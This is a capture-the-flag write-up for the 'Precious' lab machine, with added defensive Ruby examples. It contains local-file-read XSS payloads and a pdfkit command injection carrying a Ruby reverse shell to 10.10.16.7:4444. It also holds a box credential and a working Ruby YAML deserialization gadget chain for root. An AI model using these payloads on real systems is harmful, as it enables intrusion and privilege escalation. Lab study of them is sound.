Precious

Personal Rating: Medium

Enumeration

sudo nmap -sV <IP>

  • Only ssh and port 80 are open

  • There is a page where you are supposed to enter a URL and get it converted to PDF

  • nginx and Phusion Passenger 6.0.15

  • Subdomain scan, directory scan and vhost scan revealed nothing at all

On the web page, when I fetch an HTML page that I created and host on my machine, I get a PDF file as output. I will try to include JavaScript in the fetched file.

I created a test HTML page, served from my machine as http://10.10.16.7:8000/test.html, with this content to check whether the JS is executed during the PDF conversion:

<!DOCTYPE html>
<html>
  <body>
    <div id="main">The JS was not executed</div>
  </body>
  <script>
    div = document.getElementById('main');
    div.innerHTML = "The JS was executed";
  </script>
</html>

Server Side XSS?

The vulnerability is a Server Side XSS: the injected script is executed by the web handler that renders the PDF on the server itself, not in the browser of a user visiting the website. I found a list of LFI payloads to test:

<!DOCTYPE html>
<html>
  <body>
    <script>
      x=new XMLHttpRequest;
      x.onload=function(){document.write(btoa(this.responseText))};
      x.open("GET","file:///etc/passwd");x.send();
    </script>
    <script>
      xhzeem = new XMLHttpRequest();
      xhzeem.onload = function(){document.write(this.responseText);}
      xhzeem.onerror = function(){document.write('failed!')}
      xhzeem.open("GET","file:///etc/passwd");
      xhzeem.send();
    </script>
    <iframe src=file:///etc/passwd></iframe>
    <img src="xasdasdasd" onerror="document.write('<iframe src=file:///etc/passwd></iframe>')"/>
    <link rel=attachment href="file:///root/secret.txt">
    <object data="file:///etc/passwd">
    <portal src="file:///etc/passwd" id=portal>
  </body>
</html>

This line seems to make the server stop returning a PDF at all, so I removed it:

<img src="xasdasdasd" onerror="document.write('<iframe src=file:///etc/passwd></iframe>')"/>

The remaining payload collection above actually returned nothing when I sent it to the server.

Exifdata pdfkit Exploit Reveal

I checked the resulting PDF with exiftool and found out that it was generated by a pdfkit version that is vulnerable to a Ruby code injection. This is not the way that I expected. I saw that it is important to test and enumerate broadly before spending too long on an exploit path that does not work.

This was the command that did the exploit:

curl 'http://precious.htb/' \
  -X POST \
  -H 'User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:102.0) Gecko/20100101 Firefox/102.0' \
  -H 'Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8' \
  -H 'Accept-Language: en-US,en;q=0.5' \
  -H 'Accept-Encoding: gzip, deflate' \
  -H 'Content-Type: application/x-www-form-urlencoded' \
  -H 'Origin: http://precious.htb/' \
  -H 'Connection: keep-alive' \
  -H 'Referer: http://precious.htb/' \
  -H 'Upgrade-Insecure-Requests: 1' \
  --data-raw 'url=http%3A%2F%2F10.10.16.7%3A8000%2F%3Fname%3D%2520%60+ruby+-rsocket+-e%27spawn%28%22sh%22%2C%5B%3Ain%2C%3Aout%2C%3Aerr%5D%3D%3ETCPSocket.new%28%2210.10.16.7%22%2C4444%29%29%27%60' \
  --output soos.txt

I got a shell with that actually.

With this I could upgrade it to a real tty:

python3 -c 'import pty; pty.spawn("/bin/bash")'

There is the user “henry”. I cannot read the user.txt yet as I am the ruby user.
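The file:// fetches tried in the previous section and the backtick injection above come down to the same two missing controls on the URL-to-PDF endpoint: the user-supplied URL ends up in a shell command line, and the renderer is allowed to read local files. The following Ruby is an added example of how a defender would close both gaps; it is not the pdfapp code from the box and the function and constant names are my own. It assumes the wkhtmltopdf options --disable-local-file-access and --disable-javascript and the "-" convention for writing the PDF to stdout.

```ruby
# Added example (not the box's pdfapp): hardening a URL-to-PDF front end.
#   1. The URL never reaches a shell: the converter is started from an argv
#      array, so backticks or quotes inside it are just bytes in one argument.
#   2. The URL is restricted to remote http(s) and the renderer is told not
#      to read local files, which blocks the file:///etc/passwd iframe trick.
require "uri"

# None of these characters are legal in a URI, so URI.parse would reject them
# anyway; the explicit check documents the intent (belt and braces).
SHELL_META = /[`\s"<>|\\]/

def safe_pdf_url?(raw)
  return false if raw.nil? || raw.length > 2048
  return false if raw.match?(SHELL_META)
  uri = URI.parse(raw)
  # Only remote web content may be rendered: file://, ftp://, javascript: and
  # every other scheme is refused.
  return false unless %w[http https].include?(uri.scheme)
  return false if uri.host.nil? || uri.host.empty?
  true
rescue URI::InvalidURIError
  false
end

# Build the converter invocation as an argv array rather than a string.
# Kernel#system / Open3.capture2 with several arguments bypasses the shell.
# --disable-local-file-access and --disable-javascript are wkhtmltopdf
# switches (assumed here, see lead-in); "-" sends the PDF to stdout.
def wkhtmltopdf_argv(url)
  raise ArgumentError, "refusing to render #{url.inspect}" unless safe_pdf_url?(url)
  ["wkhtmltopdf", "--quiet", "--disable-local-file-access",
   "--disable-javascript", url, "-"]
end

def render_pdf(url)
  require "open3"
  pdf, status = Open3.capture2(*wkhtmltopdf_argv(url))
  raise "conversion failed" unless status.success?
  pdf
end

if __FILE__ == $0
  # Constructed inputs: one normal request, then the two payload shapes from
  # this writeup (a local file fetch and a backtick command substitution).
  ["http://example.com/report.html",
   "file:///etc/passwd",
   "http://example.com/?name=%20`id`"].each do |u|
    puts "#{u.ljust(36)} -> #{safe_pdf_url?(u) ? 'allowed' : 'rejected'}"
  end
end
```

The argv array is the real fix: once the shell is out of the picture, the URL check only narrows what the renderer will fetch, and the renderer flags stop attacker-controlled HTML from pulling local files into the output.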

Internal Enumeration

I ran linPEAS:

- Potentially Vulnerable to CVE-2022-0847
- Potentially Vulnerable to CVE-2022-2588
- CVE-2022-0847
NOPE - sudo version?
NOPE - /etc/nginx/sites-enabled/pdfapp.conf
NOPE - /usr/share/openssh/sshd_config
NOPE- /var/log/nginx/access.log
NOPE- /var/log/nginx/error.log
- /opt/sample
- ╔══════════╣ Executable files potentially added by user (limit 70)
2022-11-21+15:15:08.0729708500 /usr/local/sbin/laurel
2022-09-26+05:04:43.6880195170 /home/ruby/.bundle/config
2022-09-26+05:04:42.9800195060 /usr/local/bin/tilt
2022-09-26+05:04:42.8480195040 /usr/local/bin/rackup
2022-09-26+05:04:39.0520194460 /usr/local/bin/bundler
2022-09-26+05:04:39.0520194460 /usr/local/bin/bundle
NOPE - /tmp/passenger.YarIXDw/full_admin_password.txt
NOPE - /tmp/passenger.YarIXDw/read_only_admin_password.txt
<SNIP>

I got the creds henry:Q3c1AqGHtoI0aXAYFH from /home/ruby/.bundle/config

With that I could ssh onto the host.

Ruby SUID Dependency Update Exploit

With sudo -l I found that I can run a Ruby script as root without a password: (root) NOPASSWD: /usr/bin/ruby /opt/update_dependencies.rb

After changing the PATH to include /home/henry and creating a file called dependencies.yml in it, I looked at the update_dependencies.rb script. It uses YAML.load(File.read... on the dependency file, which is vulnerable to insecure deserialization and can lead to code execution. I had to peek at a writeup for this as I got stuck.

I put this in the dependencies.yml:

--- !ruby/object:Gem::Requirement
requirements:
  !ruby/object:Gem::DependencyList
  specs:
  - !ruby/object:Gem::Source::SpecificFile
    spec: &1 !ruby/object:Gem::StubSpecification
      loaded_from: "/root/root.txt"
  - !ruby/object:Gem::Source::SpecificFile
      spec:

I wanted a shell as root, so I researched further.

In the end, this payload worked to get a root shell:

---
- !ruby/object:Gem::Installer
    i: x
- !ruby/object:Gem::SpecFetcher
    i: y
- !ruby/object:Gem::Requirement
  requirements:
    !ruby/object:Gem::Package::TarReader
    io: &1 !ruby/object:Net::BufferedIO
      io: &1 !ruby/object:Gem::Package::TarReader::Entry
         read: 0
         header: "abc"
      debug_output: &1 !ruby/object:Net::WriteAdapter
         socket: &1 !ruby/object:Gem::RequestSet
             sets: !ruby/object:Net::WriteAdapter
                 socket: !ruby/module 'Kernel'
                 method_id: :system
             git_set: /bin/bash
         method_id: :resolve
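The payloads above only work because YAML.load honours !ruby/object tags and instantiates whatever class they name. The Ruby below is an added example of how the dependency file should be loaded instead; it is not the update_dependencies.rb from the box. It uses YAML.safe_load, which refuses tagged objects, symbols and aliases, and then checks that the data has the only shape the script needs (gem name => version string). The sample documents are constructed for the example. This covers the parsing half; the other half is that the script should read the file from a fixed, root-owned path rather than one found through the caller's PATH.

```ruby
# Added example (not the box's update_dependencies.rb): load a dependency
# file without giving the YAML author the ability to build arbitrary objects.
require "yaml"

VERSION_RE  = /\A\d+(\.\d+)*\z/
GEM_NAME_RE = /\A[a-z0-9_\-]+\z/i

# Returns a Hash of gem name => version string, or raises.
def load_dependencies(text)
  # safe_load permits only scalars, arrays and hashes. Any !ruby/object tag
  # raises Psych::DisallowedClass before an instance is ever allocated, and
  # aliases (&1 / *1) raise Psych::BadAlias.
  data = YAML.safe_load(text)
  raise ArgumentError, "top level must be a mapping" unless data.is_a?(Hash)
  data.each do |name, version|
    unless name.is_a?(String) && name.match?(GEM_NAME_RE)
      raise ArgumentError, "bad gem name #{name.inspect}"
    end
    unless version.is_a?(String) && version.match?(VERSION_RE)
      raise ArgumentError, "bad version for #{name}: #{version.inspect}"
    end
  end
  data
end

# true if the document is accepted, false for any rejection reason.
def dependencies_accepted?(text)
  load_dependencies(text)
  true
rescue Psych::DisallowedClass, Psych::BadAlias, Psych::SyntaxError, ArgumentError
  false
end

# Constructed sample: what a legitimate dependencies.yml should look like.
GOOD_YAML = <<~YAML
  rails: "7.0.4"
  rack: "2.2.4"
YAML

# Constructed sample: a minimal tagged document. It shares the shape of the
# payloads in this writeup but names no chain; the tag alone is what
# safe_load refuses.
TAGGED_YAML = <<~YAML
  --- !ruby/object:Gem::Requirement
  requirements: x
YAML

if __FILE__ == $0
  p load_dependencies(GOOD_YAML)
  begin
    load_dependencies(TAGGED_YAML)
  rescue Psych::DisallowedClass => e
    puts "rejected: #{e.message}"
  end
end
```

On Ruby 3.1 and later (Psych 4) YAML.load already behaves like safe_load, which is why the writeup's payload needs the older interpreter found on the box; calling safe_load explicitly makes the behaviour independent of the installed Psych version.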

References:

  • https://www.ctfiot.com/84447.html
  • Universal RCE with Ruby YAML.load - Staaldraad
  • https://github.com/swisskyrepo/PayloadsAllTheThings/blob/master/Insecure%20Deserialization/Ruby.md